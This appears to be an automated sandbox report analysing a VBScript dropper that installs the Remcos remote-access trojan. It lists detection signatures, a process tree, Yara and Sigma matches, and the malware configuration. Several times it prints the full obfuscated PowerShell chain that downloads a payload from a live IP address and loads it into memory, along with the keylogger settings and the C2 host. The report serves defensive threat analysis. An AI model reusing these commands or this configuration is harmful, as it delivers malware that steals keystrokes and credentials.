Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1559185
MD5:619077e3c8387532a2d930e2b86c9ff7
SHA1:081166adc2aed980d757c61687838f53ecaf4224
SHA256:3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664
Tags:opendirvbsuser-Joker
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7240 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 7308 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 7396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["remcosnov24.duckdns.org:4576:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0883UG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\registros.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b6f8:$a1: Remcos restarted by watchdog!
            • 0x6bc70:$a3: %02i:%02i:%02i:%03i
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              15.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                15.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  15.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6b6f8:$a1: Remcos restarted by watchdog!
                  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                  15.2.AddInProcess32.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x65a04:$str_b2: Executing file:
                  • 0x6683c:$str_b3: GetDirectListeningPort
                  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x66380:$str_b7: \update.vbs
                  • 0x65a2c:$str_b9: Downloaded file:
                  • 0x65a18:$str_b10: Downloading file:
                  • 0x65abc:$str_b12: Failed to upload file:
                  • 0x66804:$str_b13: StartForward
                  • 0x66824:$str_b14: StopForward
                  • 0x662d8:$str_b15: fso.DeleteFile "
                  • 0x6626c:$str_b16: On Error Resume Next
                  • 0x66308:$str_b17: fso.DeleteFolder "
                  • 0x65aac:$str_b18: Uploaded file:
                  • 0x65a6c:$str_b19: Unable to delete:
                  • 0x662a0:$str_b20: while fso.FileExists("
                  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 20 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing 